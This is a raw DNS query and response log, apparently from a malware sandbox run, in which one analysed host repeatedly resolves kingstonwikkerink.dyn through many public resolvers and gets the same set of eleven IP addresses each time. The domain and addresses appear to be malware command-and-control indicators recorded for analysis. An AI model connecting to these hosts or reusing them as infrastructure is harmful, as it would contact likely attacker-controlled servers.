                                                                                            Oct 26, 2024 19:45:13.110016108 CEST192.168.2.13217.160.70.420xa1bfStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:19.436923027 CEST192.168.2.13178.254.22.1660x56ebStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:24.440583944 CEST192.168.2.13185.181.61.240x49abStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:30.451375008 CEST192.168.2.13139.84.165.1760x9214Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:35.459011078 CEST192.168.2.13168.235.111.720x2c64Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:41.948756933 CEST192.168.2.1380.152.203.1340x620bStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:47.694334984 CEST192.168.2.1365.21.1.1060x1f9bStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:53.646575928 CEST192.168.2.13194.36.144.870x6fdfStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Oct 26, 2024 19:43:34.113245010 CEST80.152.203.134192.168.2.130x18efNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:34.113245010 CEST80.152.203.134192.168.2.130x18efNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:34.113245010 CEST80.152.203.134192.168.2.130x18efNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:34.113245010 CEST80.152.203.134192.168.2.130x18efNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:34.113245010 CEST80.152.203.134192.168.2.130x18efNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:34.113245010 CEST80.152.203.134192.168.2.130x18efNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:34.113245010 CEST80.152.203.134192.168.2.130x18efNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:34.113245010 CEST80.152.203.134192.168.2.130x18efNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:34.113245010 CEST80.152.203.134192.168.2.130x18efNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:34.113245010 CEST80.152.203.134192.168.2.130x18efNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:34.113245010 CEST80.152.203.134192.168.2.130x18efNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:34.406843901 CEST80.152.203.134192.168.2.130x18efFormat error (1)kingstonwikkerink.dynnonenoneA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:36.959196091 CEST1.1.1.1192.168.2.130x7059No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:36.959196091 CEST1.1.1.1192.168.2.130x7059No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:40.119837046 CEST81.169.136.222192.168.2.130x18feNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:40.119837046 CEST81.169.136.222192.168.2.130x18feNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:40.119837046 CEST81.169.136.222192.168.2.130x18feNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:40.119837046 CEST81.169.136.222192.168.2.130x18feNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:40.119837046 CEST81.169.136.222192.168.2.130x18feNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:40.119837046 CEST81.169.136.222192.168.2.130x18feNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:40.119837046 CEST81.169.136.222192.168.2.130x18feNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:40.119837046 CEST81.169.136.222192.168.2.130x18feNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:40.119837046 CEST81.169.136.222192.168.2.130x18feNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:40.119837046 CEST81.169.136.222192.168.2.130x18feNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:40.119837046 CEST81.169.136.222192.168.2.130x18feNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:48.449857950 CEST51.158.108.203192.168.2.130xb1feNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:48.449857950 CEST51.158.108.203192.168.2.130xb1feNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:48.449857950 CEST51.158.108.203192.168.2.130xb1feNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:48.449857950 CEST51.158.108.203192.168.2.130xb1feNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:48.449857950 CEST51.158.108.203192.168.2.130xb1feNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:48.449857950 CEST51.158.108.203192.168.2.130xb1feNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:48.449857950 CEST51.158.108.203192.168.2.130xb1feNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:48.449857950 CEST51.158.108.203192.168.2.130xb1feNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:48.449857950 CEST51.158.108.203192.168.2.130xb1feNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:48.449857950 CEST51.158.108.203192.168.2.130xb1feNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:48.449857950 CEST51.158.108.203192.168.2.130xb1feNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:54.359203100 CEST152.53.15.127192.168.2.130xfd81No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:54.359203100 CEST152.53.15.127192.168.2.130xfd81No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:54.359203100 CEST152.53.15.127192.168.2.130xfd81No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:54.359203100 CEST152.53.15.127192.168.2.130xfd81No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:54.359203100 CEST152.53.15.127192.168.2.130xfd81No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:54.359203100 CEST152.53.15.127192.168.2.130xfd81No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:54.359203100 CEST152.53.15.127192.168.2.130xfd81No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:54.359203100 CEST152.53.15.127192.168.2.130xfd81No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:54.359203100 CEST152.53.15.127192.168.2.130xfd81No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:54.359203100 CEST152.53.15.127192.168.2.130xfd81No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:54.359203100 CEST152.53.15.127192.168.2.130xfd81No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:05.750216961 CEST194.36.144.87192.168.2.130x9464No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:05.750216961 CEST194.36.144.87192.168.2.130x9464No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:05.750216961 CEST194.36.144.87192.168.2.130x9464No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:05.750216961 CEST194.36.144.87192.168.2.130x9464No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:05.750216961 CEST194.36.144.87192.168.2.130x9464No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:05.750216961 CEST194.36.144.87192.168.2.130x9464No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:05.750216961 CEST194.36.144.87192.168.2.130x9464No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:05.750216961 CEST194.36.144.87192.168.2.130x9464No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:05.750216961 CEST194.36.144.87192.168.2.130x9464No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:05.750216961 CEST194.36.144.87192.168.2.130x9464No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:05.750216961 CEST194.36.144.87192.168.2.130x9464No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:11.607656002 CEST51.158.108.203192.168.2.130x1274No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:11.607656002 CEST51.158.108.203192.168.2.130x1274No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:11.607656002 CEST51.158.108.203192.168.2.130x1274No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:11.607656002 CEST51.158.108.203192.168.2.130x1274No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:11.607656002 CEST51.158.108.203192.168.2.130x1274No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:11.607656002 CEST51.158.108.203192.168.2.130x1274No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:11.607656002 CEST51.158.108.203192.168.2.130x1274No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:11.607656002 CEST51.158.108.203192.168.2.130x1274No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:11.607656002 CEST51.158.108.203192.168.2.130x1274No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:11.607656002 CEST51.158.108.203192.168.2.130x1274No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:11.607656002 CEST51.158.108.203192.168.2.130x1274No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:27.995919943 CEST202.61.197.122192.168.2.130x2103No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:27.995919943 CEST202.61.197.122192.168.2.130x2103No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:27.995919943 CEST202.61.197.122192.168.2.130x2103No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:27.995919943 CEST202.61.197.122192.168.2.130x2103No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:27.995919943 CEST202.61.197.122192.168.2.130x2103No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:27.995919943 CEST202.61.197.122192.168.2.130x2103No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:27.995919943 CEST202.61.197.122192.168.2.130x2103No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:27.995919943 CEST202.61.197.122192.168.2.130x2103No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:27.995919943 CEST202.61.197.122192.168.2.130x2103No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:27.995919943 CEST202.61.197.122192.168.2.130x2103No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:27.995919943 CEST202.61.197.122192.168.2.130x2103No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:33.954674006 CEST80.152.203.134192.168.2.130xc48No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:33.954674006 CEST80.152.203.134192.168.2.130xc48No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:33.954674006 CEST80.152.203.134192.168.2.130xc48No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:33.954674006 CEST80.152.203.134192.168.2.130xc48No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:33.954674006 CEST80.152.203.134192.168.2.130xc48No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:33.954674006 CEST80.152.203.134192.168.2.130xc48No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:33.954674006 CEST80.152.203.134192.168.2.130xc48No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:33.954674006 CEST80.152.203.134192.168.2.130xc48No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:33.954674006 CEST80.152.203.134192.168.2.130xc48No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:33.954674006 CEST80.152.203.134192.168.2.130xc48No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:33.954674006 CEST80.152.203.134192.168.2.130xc48No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:44.818495035 CEST194.36.144.87192.168.2.130xf95aNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:44.818495035 CEST194.36.144.87192.168.2.130xf95aNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:44.818495035 CEST194.36.144.87192.168.2.130xf95aNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:44.818495035 CEST194.36.144.87192.168.2.130xf95aNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:44.818495035 CEST194.36.144.87192.168.2.130xf95aNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:44.818495035 CEST194.36.144.87192.168.2.130xf95aNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:44.818495035 CEST194.36.144.87192.168.2.130xf95aNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:44.818495035 CEST194.36.144.87192.168.2.130xf95aNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:44.818495035 CEST194.36.144.87192.168.2.130xf95aNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:44.818495035 CEST194.36.144.87192.168.2.130xf95aNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:44.818495035 CEST194.36.144.87192.168.2.130xf95aNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:55.781477928 CEST217.160.70.42192.168.2.130x504eNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:55.781477928 CEST217.160.70.42192.168.2.130x504eNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:55.781477928 CEST217.160.70.42192.168.2.130x504eNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:55.781477928 CEST217.160.70.42192.168.2.130x504eNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:55.781477928 CEST217.160.70.42192.168.2.130x504eNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:55.781477928 CEST217.160.70.42192.168.2.130x504eNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:55.781477928 CEST217.160.70.42192.168.2.130x504eNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:55.781477928 CEST217.160.70.42192.168.2.130x504eNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:55.781477928 CEST217.160.70.42192.168.2.130x504eNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:55.781477928 CEST217.160.70.42192.168.2.130x504eNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:55.781477928 CEST217.160.70.42192.168.2.130x504eNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:06.740375996 CEST202.61.197.122192.168.2.130xd7a4No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:06.740375996 CEST202.61.197.122192.168.2.130xd7a4No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:06.740375996 CEST202.61.197.122192.168.2.130xd7a4No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:06.740375996 CEST202.61.197.122192.168.2.130xd7a4No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:06.740375996 CEST202.61.197.122192.168.2.130xd7a4No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:06.740375996 CEST202.61.197.122192.168.2.130xd7a4No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:06.740375996 CEST202.61.197.122192.168.2.130xd7a4No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:06.740375996 CEST202.61.197.122192.168.2.130xd7a4No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:06.740375996 CEST202.61.197.122192.168.2.130xd7a4No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:06.740375996 CEST202.61.197.122192.168.2.130xd7a4No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:06.740375996 CEST202.61.197.122192.168.2.130xd7a4No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:13.144752979 CEST217.160.70.42192.168.2.130xa1bfNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:13.144752979 CEST217.160.70.42192.168.2.130xa1bfNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:13.144752979 CEST217.160.70.42192.168.2.130xa1bfNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:13.144752979 CEST217.160.70.42192.168.2.130xa1bfNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:13.144752979 CEST217.160.70.42192.168.2.130xa1bfNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:13.144752979 CEST217.160.70.42192.168.2.130xa1bfNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:13.144752979 CEST217.160.70.42192.168.2.130xa1bfNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:13.144752979 CEST217.160.70.42192.168.2.130xa1bfNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:13.144752979 CEST217.160.70.42192.168.2.130xa1bfNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:13.144752979 CEST217.160.70.42192.168.2.130xa1bfNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:13.144752979 CEST217.160.70.42192.168.2.130xa1bfNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:24.474996090 CEST185.181.61.24192.168.2.130x49abNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:24.474996090 CEST185.181.61.24192.168.2.130x49abNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:24.474996090 CEST185.181.61.24192.168.2.130x49abNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:24.474996090 CEST185.181.61.24192.168.2.130x49abNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:24.474996090 CEST185.181.61.24192.168.2.130x49abNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:24.474996090 CEST185.181.61.24192.168.2.130x49abNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:24.474996090 CEST185.181.61.24192.168.2.130x49abNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:24.474996090 CEST185.181.61.24192.168.2.130x49abNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:24.474996090 CEST185.181.61.24192.168.2.130x49abNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:24.474996090 CEST185.181.61.24192.168.2.130x49abNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:24.474996090 CEST185.181.61.24192.168.2.130x49abNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:35.549153090 CEST168.235.111.72192.168.2.130x2c64No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:35.549153090 CEST168.235.111.72192.168.2.130x2c64No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:35.549153090 CEST168.235.111.72192.168.2.130x2c64No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:35.549153090 CEST168.235.111.72192.168.2.130x2c64No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:35.549153090 CEST168.235.111.72192.168.2.130x2c64No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:35.549153090 CEST168.235.111.72192.168.2.130x2c64No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:35.549153090 CEST168.235.111.72192.168.2.130x2c64No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:35.549153090 CEST168.235.111.72192.168.2.130x2c64No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:35.549153090 CEST168.235.111.72192.168.2.130x2c64No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:35.549153090 CEST168.235.111.72192.168.2.130x2c64No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:35.549153090 CEST168.235.111.72192.168.2.130x2c64No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:42.028717041 CEST80.152.203.134192.168.2.130x620bNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:42.028717041 CEST80.152.203.134192.168.2.130x620bNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:42.028717041 CEST80.152.203.134192.168.2.130x620bNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:42.028717041 CEST80.152.203.134192.168.2.130x620bNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:42.028717041 CEST80.152.203.134192.168.2.130x620bNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
